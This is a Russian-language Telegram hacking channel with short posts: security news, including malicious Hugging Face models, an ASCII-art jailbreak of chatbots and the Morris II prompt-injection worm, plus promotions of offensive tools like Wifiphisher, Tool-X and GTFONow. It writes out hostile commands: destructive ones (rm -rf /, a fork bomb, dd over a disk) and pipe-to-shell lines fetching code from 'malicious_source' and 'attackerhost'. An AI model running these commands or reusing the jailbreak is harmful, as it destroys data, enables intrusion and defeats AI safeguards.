Kali Linux
53.1K subscribers
1.03K photos
74 videos
13 files
1.08K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
💻 Вредоносные Deep Learning модели

На платформе Hugging Face обнаружено не менее 100 вредоносных Deep Learning моделей, некоторые из которых могут выполнять код на машине жертвы, предоставляя злоумышленникам постоянный бэкдор.

Специалисты компании JFrog разработали и развернули продвинутую систему сканирования для проверки моделей PyTorch и Tensorflow Keras, размещенных на Hugging Face.
Малварь проникла в Hugging Face несмотря на все меры безопасности, включая сканирование на наличие малвари, а также тщательное изучение функциональности моделей для обнаружения такого поведения, как небезопасная десериализация.

Одним из примеров стала модель PyTorch, загруженная недавно пользователем под ником baller423 и уже удаленная с HuggingFace. Она содержала полезную нагрузку, которая позволяла создать реверс-шелл на указанный хост (210.117.212.93). Вредоносная полезная нагрузка использовала метод __reduce__ модуля pickle для выполнения произвольного кода при загрузке файла модели PyTorch, при этом избегая обнаружения за счет встраивания малвари в доверенный процесс сериализации.

В JFrog обнаружили, что та же полезная нагрузка связывалась и с другими IP-адресами, что позволяет предположить, что ее операторы все же являются ИИ- и ИБ-исследователями, а не хакерами. Однако такие эксперименты в JFrog все равно называют слишком рискованными, учитывая, что опасные модели были общедоступны.

Пытаясь определить истинные намерения операторов вредоноса, аналитики развернули приманку для привлечения активности и ее анализа. Им удалось установить соединение с сервером потенциальных злоумышленников, однако не удалось перехватить ни одной команды за время поддержания соединения.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
17👍11🔥6🎉2
💻 Tool-X — набор из 370 инструментов Kali Linux

apt update
apt install git
git clone https://github.com/rajkumardusad/Tool-X.git
cd Tool-X
chmod +x install
sh install if not work than use ./install

Tool-X содержит инструменты для:
├── сбора информации
├── сканирования уязвимостей
├── инструменты эксплойта
├── тестирование беспроводных сетей
├── инструменты форензики
└── инструменты для DDOS

и ещё много всего интересного, не благодарите)

🖥 GitHub

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍569🔥7🤔1
🥷 Как хакнуть GPT

Исследователи раскрыли хак, как убрать из ChatGPT цензуру и заставить ИИ отвечать без ограничений со стороны разработчиков. Оказалось. что для этого нужно просто замаскировать запрос под арт ASCII.

После этого ChatGPT может сообщить различные ранее запрещённые для раскрытия инструкции и заблокированную информацию. Этот баг есть во всех популярных нейросетях — GPT-3.5, GPT-4, Gemini, Claude и Llama2.

¯\_(ツ)_/¯

@linuxkalii
🔥50👍174👎3🤬1
💻 Атака KeyTrap позволяет вывести из строя DNS-сервер

Группа немецких исследователей обнаружила уязвимость в DNSSEC — наборе расширений протокола DNS, которые предназначены для повышения его безопасности.
Атака KeyTrap, эксплуатирующая эту уязвимость, позволяет вывести из строя DNS-сервер, отправив ему 1 вредоносный пакет данных.


🗄Как работает атака KeyTrap
Уязвимость в DNSSEC была обнаружена пару месяцев назад и зарегистрирована как CVE-2023-50387. Ей присвоена оценка 7,5 по шкале CVSS 3.1 и уровень опасности «высокий».

Суть KeyTrap. Атакующий создает DNS-сервер, отвечающий на запросы кэширующих DNS-серверов вредоносным пакетом. Далее злоумышленник заставляет кэширующий сервер запросить DNS-запись у вредоносного DNS-сервера, который в ответ отправляет криптографически подписанную вредоносную DNS-запись. Подпись выполнена таким образом, что в процессе ее проверки атакуемый DNS-сервер зависает с загрузкой процессора 100%.

В зависимости от ПО на DNS-сервере, эта атака может заставить сервер зависнуть на срок до 16 часов. Атака KeyTrap может не только лишить доступа к веб-контенту всех клиентов DNS-сервера, но и помешать работе различных инфраструктурных сервисов, таких как защита от спама, обработка цифровых сертификатов (PKI) и безопасная междоменная маршрутизация (RPKI).

KeyTrap называют «самой серьезной из атак на DNS-серверы». Интересно, что изъяны в логике проверки подписи, которые делают эту атаку возможной, обнаружены еще в одной из самых ранних версий спецификации DNSSEC, опубликованной аж в 1999 году.


🗄Защита от KeyTrap
Исследователи уведомили всех разработчиков программного обеспечения для DNS-серверов и крупнейших публичных DNS-провайдеров. Закрывающие уязвимость CVE-2023-50387 обновления и рекомендации по безопасности уже доступны для PowerDNS, NLnet Labs Unbound и Internet Systems Consortium BIND9. Так что если вы администрируете DNS-сервер, самое время накатить обновления.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
22👍7🔥6😱4
💻 Wifiphisher — мощный инструмент Kali

Wifiphisher — это инструмент для создания ложной точки доступа; предназначен для RedTeam или тестирования безопасности Wi-Fi.
С помощью Wifiphisher пентестеры могут легко устроить MITM против беспроводных клиентов, выполняя направленные атаки Wi-Fi.
Wifiphisher также может использоваться для организации фишинговых атак, настраиваемых для жертвы, для захвата учетных данных подключенных клиентов (например, со страниц входа сторонних сервисов или предустановленных ключей WPA/WPA2) или для инфицирования жертвы вредоносным программным обеспечением.

Фичи Wifiphisher
🗄мощный. Wifiphisher может работать в течение часов внутри устройства Raspberry Pi, выполняя все современные техники (включая "Evil Twin", "KARMA" и "Known Beacons")

🗄гибкий. Имеет десятки параметров и поставляется с набором шаблонов фишинга, для различных сценариев использования.

🗄модульный. Пользователи могут писать скрипты на Python для расширения функциональности инструмента или создания настраиваемых сценариев для проведения конкретных целевых атак.

🗄легкий в использовании. Продвинутые пользователи могут воспользоваться богатым набором функций, предлагаемых Wifiphisher, но начинающие могут начать, просто запустив команду ./bin/wifiphisher. Интерактивный текстовый пользовательский интерфейс помогает удобно настраивать атаку.

🗄основан на результатах обширных исследований. Атаки, такие как "Known Beacons" и "Lure10", а также современные техники фишинга были раскрыты разработчиками Wifiphisher, которые и добавили в него эти новые возможности

🗄поддерживается отличным сообществом разработчиков и пользователей и бесплатный — что всегда приятно

Пользуйтесь на здоровье)

🖥 GitHub
📁 Доки

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍469🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
😂 Хакерство из фильмов.

Взломщик показал, как взламывает светофоры с помощью девайса Flipper Zero и теперь всегда может ехать «на зелёный».

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥70😁349👎8👍6👏1
💻 Массовые аттаки на сайты WordPress

Sucuri предупреждает, что хакеры проводят атаки на сайты под управлением WordPress и внедряют скрипты, которые заставляют брутфорсить пароли для других сайтов.

Стоящие за этим хакеры обычно взламывают сайты, чтобы внедрять на них скрипты для угона криптокошельков. Их скрипты отображают мошеннические сообщения. Если человек попадается, скрипты похищают все активы в его кошельке.

Обычно хакеры использовали сайты на WordPress, внедряя на них AngelDrainer. Атаки осуществлялись несколькими волнами с различных URL, последним был dynamiclink[.]lol/cachingjs/turboturbo.js.

Однако теперь мошенники используют браузеры посетителей для брутфорса других WordPress-сайтов, применяя для этого вредоносный скрипт с недавно зарегистрированного домена dynamic-linx[.]com/chx.js.

То есть злоумышленники взламывают сайт под управлением WordPress и внедряют в его HTML-шаблоны вредоносный код. Когда посетители заходят на такой сайт, в их браузер загружаются скрипты с https://dynamic-linx[.]com/chx.js.

Эти скрипты вынуждают браузеры жертв связываться с сервером хакеров (https://dynamic-linx[.]com/getTask.php) и получать задание на перебор паролей. Оно поставляется в виде JSON-файла, содержащего необходимые параметры для атаки: ID, URL сайта, имя учетной записи, число, обозначающее текущую партию паролей для перебора, а также сто паролей для пробы.

При получении задания браузер жертвы загружает файл через XMLRPC-интерфейс WordPress, используя имя учетной записи и пароль из JSON. Если пароль подобран правильно, скрипт уведомит своих операторов о том, что пароль для сайта найден.

По данным PublicHTML, в настоящее время такими скриптами заражены более 1700 сайтов. К примеру, в числе взломанных ресурсов можно найти даже сайт Ассоциации частных банков Эквадора.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍46🔥65😁2🤔2
🔥Подборка лучших обучающих каналов для программистов.

➡️ Делитесь с коллегами и cохраняйте себе, чтобы не потерять

⚡️ Frontend
Javascript академия - крупнейший js канал
React - лучшие гайды и советы по работе с react
Frontend - тутрориалы, уроки, гайды, код
PHP
Книги frontend
Задачи frontend

💥 Хакинг Kali Linux

Kali linux
linux_kal - kali чат
Информационная безопасность

🚀 Data Science

Анализ данных - полезные фишки, код, гайды и советы, маст-хэв датасаентиста
Data Jobs - ds вакансии
Аналитик данных
Data Science книги - актуальные бесплатные книги
Big data

#️⃣C#

С# академия
С# заметки — код, лучшие практики, заметки программиста c#
С# задачи и тесты
С# библиотека - актуальные бесплатные книги
C# вакансии - работа

Машинное обучение

Ml Собеседование - подготовка к собеседовению мл, алгоритмам, кодингу
Ml ru - актуальные статьи, новости, код и обучающие материалы
Ml Jobs - вакансии ML
ML Книги - актуальные бесплатные книги МО
ML чат
Machine Learning - полезные статьи новости гайды и разбор кода

🏆 Golang
Golang - подробные гайды, разбор кода, лучшие практики, заметки
Golang собеседование
Golang вакансии
Golang книги
Golang задачи и тесты
Golang чат
Golang news - новости go

🐍 Python

Python/django
Python Собеседование - подготовка к собеседовению python и разбор алгоритмов
Pro python - статьи, новости, код и обучающие материалы
Python Jobs - вакансии Python
Python чат
Python книги

Java

Java академия
Java вакансии
Java чат
Java вопросы с собеседований
Java книги

🛢Базы данных
Sql базы данных
Библиотека баз данных
SQL чат

💻 C++

C++ академия
С++ книги
C++ задачи - подготовка к собеседовению мл, алгоритмам
C++ вакансии

🐧 Linux

Linux academy

🦀 Rust
Rust программирование
Rust чат
Rust книги для программистов

📲 Мобильная разработка
Android разработка
Мобильный разработчик гайды и уроки

🇬🇧 Английский для программистов

🧠 Искусственный интеллект
ИИ и технологии
Neural - нейросети для работы и жизни
Книги ИИ
Artificial Intelligence

🔥 DevOPs
Devops для программистов
Книги Devops

🌟 Docker/Kubernets
Docker
Kubernets

📓 Книги
Библиотеки Книг для программситов

💼 Папка с вакансиями:
Папка Go разработчика:
Папка Python разработчика:
Папка Data Science
Папка Java разработчика
Папка C#
Папка Frontend
👍245🔥5
💻 Никогда не запускай эти 10+ команд Linux

Обожаю Linux за его гибкость и безграничные возможности)

🗄rm -rf / – Эта команда удалит все файлы и папки на вашем компьютере.

🗄:(){ :|: & };: – Это команда, также известная как "fork bomb", может вызвать переполнение памяти на вашем компьютере и привести к аварийному завершению системы.

🗄mkfs.ext4 /dev/sda – Эта команда форматирует жесткий диск без какого-либо предупреждения или подтверждения. Все данные будут утеряны.

🗄dd if=/dev/random of=/dev/sda – Эта команда перезапишет все данные на жестком диске случайными значениями, что приведет к потере данных.

🗄chmod 777 / – Эта команда откроет полный доступ к вашей файловой системе для всех пользователей, что может привести к нарушению безопасности.

🗄mv /home/* /dev/null – Эта команда переместит все файлы в вашей домашней директории в "null", короче, они будут утеряны.

🗄wget http://example.com/file -O /dev/null – Эта команда загрузит файл и перезапишет все данные в "null", что приведет к потере данных.

🗄mkfs.ext4 /dev/sda1 – Эта команда форматирует раздел жесткого диска без какого-либо предупреждения или подтверждения. Все данные на этом разделе будут утеряны.

🗄ln -s /dev/null /etc/passwd – Эта команда создаст символическую ссылку на "/etc/passwd" в "null", что приведет к потере данных.

🗄echo "Hello" > /dev/sda – это заменит ваш раздел, содержащий все данные, необходимые для загрузки системы, строкой «Hello».

🗄wget http://malicious_source -O- | sh – Такие команды будут загружать и запускать в вашей системе вредоносные сценарии, которые могут подорвать безопасность вашей системы.

В общем, берите ненужный комп — и да начнётся веселье

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍58🔥2011👎2
🚀 Cybersecurity for Beginners – a curriculum

Microsoft выпустила крутейший курс. Совешенно бесплатно Security-101 для изучения основ кибербезопасности.

Он подойдёт всем, кто желает ознакомиться с базовыми принципами защиты от киберугроз.

Всего доступно семь уроков со статьями, видео и дополнительными материалами.

📌 Курс

@linuxkalii
👍32🔥93
Social engineering books - книги по хакингу и информационной безопасностb

Linux academy - лайхаки, полезные инструменты для работы с linux

Linux books - полезные и актуальные книги о Linux.

Вакансии сетевого администратора
👍186🔥2
💻 Нейросетевой червь —
— новая гроза почтовых клиентов с AI-фичами


Группа исследователей из Израильского технологического института и компании Intuit разработали червя Morris II, который заточен на атаки нейросетевых приложений и почтовых клиентов с поддержкой нейросетевых функций. Morris II способен красть личные данные, внедрять вредоносное ПО, спамить пользователей и распространяться через несколько связанных сервисов.

Исследование демонстрирует, что злоумышленники могут использовать запросы (например, в обычном письме), которые при обработке генеративной нейросетью заставляют её воспроизводить входные данные в качестве выходных и совершать вредоносные действия. Червь был протестирован против трёх различных моделей — Gemini Pro, ChatGPT 4.0 и LLaVA, а также оценены различные факторы (например, скорость распространения, репликация, вредоносная активность), влияющие на его эффективность.

В данный момент речь идёт о научном исследовании в искусственно созданной среде, и, по словам авторов, пока нет признаков того, что подобные черви уже действуют в интернете, но это лишь вопрос времени. Команда сообщила о своих результатах в Google и OpenAI.

📎 Подробнее можно почитать тут

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍173🔥3😁2
🖥 Где изучать Linux в 2025. Бесплатные курсы, книги и ресурсы

Видео
Статья

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍31🔥64
🖥 Получение мостов tor из GMail с помощью Python

Учите Python, он везде)
1 шаг — установка внешних библиотек
pip install python-decouple opencv-python pyzbar IMAPClient
decouple — для чтения данных из файла
opencv — для чтения изображения с QR-кодом
pyzbar — чтобы прочитать данные, закодированные в QR-коде
IMAPClient — с помощью неё будем работать с сообщениями на почтовом сервере

Так как мы будем использовать пароль приложений, а также логин от аккаунта Google, то в коде его желательно не использовать. Поэтому, необходимо создать файл «.env» с примерным содержимым:
login = "test@gmail.com"
pwd = "gffg sbbp jccj vhhi"


2 шаг — импорт библиотек

3 шаг — считывание данных из QR-кода

4 шаг — отправка письма

5 шаг — чтение почты

▶️ Полностью о каждом шаге можно прочитать тут

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍237🔥3
Windows Matrix UHD.png
3.6 MB
💻 Держите, дерево всевозможных аттак на Windows

На вскидку здесь их 200+, не считал
Всё удобненько сгруппировано, чтобы можно было сориентироваться и сразу понять, как...
...тестировать свою Windows, а иначе для чего это всё
Ну вы понимаете)

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍407🔥7👎2😁1
💻 Инфраструктурный пентест по шагам: сканирование и получение доступа

Годная статья, в которой описываются разные техники повышения привилегий и закрепления в системе.

Например, вот так рассказывается, как получить доступ на запись в папку веб-сервера.
— «На одном из недавних проектов мы обнаружили возможность записывать данные в папку веб-сервера IIS без авторизации. Мы сделали ASPX-файл, загрузили его на сервер и обратились к нему через браузер. Таким образом мы получили возможность исполнять команды в рамках контекста веб-сервера, а он, так же, как MS SQL, имеет привилегию имперсонализации. Мы сделали имперсонализацию и поднялись до системных привилегий. Создали себе учетную запись, зашли на этот веб-сервер через парадную дверь и начали продвигаться по инфраструктуре.»

В целом в статье довольно много полезностей, рекомендую

📎 Статья

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍32🔥87
13 марта 2013 года был выпущен Kali Linux

С прошедшим днем рождения любимый дистрибутив хакеров 🎂 👾

@linuxkalii
👍111🎉4021🔥6
💻 Новые WebTunnel мосты Tor имитируют HTTPS-трафик

Разработчики Tor Project объявили о запуске новой функции — мостов WebTunnel, которые работают на основе устойчивого к обнаружению HTTPT-прокси и позволяют трафику Tor лучше смешиваться с обычным HTTPS-трафиком.

🗄Напомним, что мосты Tor представляют собой ретрансляторы, не перечисленные в публичном каталоге Tor, которые позволяют маскировать соединения пользователей. Так как уже довольно давно найдены способы обнаружения и блокировки таких соединения (например, в Китае), Tor также использует мосты obfsproxy, которые добавляют дополнительный уровень обфускации.

🗄Как рассказывают разработчики, мосты WebTunnel предназначены для имитации зашифрованного трафика (HTTPS) и основаны на HTTPT. Они оборачивают полезную нагрузку соединения в WebSocket-подобное HTTPS-соединение, которое выглядит как обычный HTTPS (WebSocket).То есть для стороннего наблюдателя это обычное HTTP-соединение, в ходе которого пользователь просто просматривает веб-страницы.

🗄Отмечается, что тестирование WebTunnel началось еще в летом 2023 года. В настоящее время по всему миру работают около 60 мостов WebTunnel, и около 700 активных пользователей ежедневно используют новые мосты на разных платформах. Однако пока WebTunnel работает не во всех регионах, а адрес мостов нужно получать вручную, что планируют доработать в будущем.

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍32🔥87
This media is not supported in your browser
VIEW IN TELEGRAM
💻 В этом посте поговорим об инструменте `GTFONow`

Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.

Основные особенности:
🗄Автоматическая эксплуатация неправильно настроенных разрешений sudo.
🗄Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
🗄Автоматическая эксплуатация неправильных настроенных компонентов ОС.
🗄Автоматическая эксплуатация через SSH‑ключи.
🗄Автоматическая эксплуатация через файл используемый в cron.
🗄Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
🗄Легкий запуск без файлов с помощью curl http://attackerhost/gtfonow.py | python

🖥 GTFONow

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
15👍8🔥4🤯2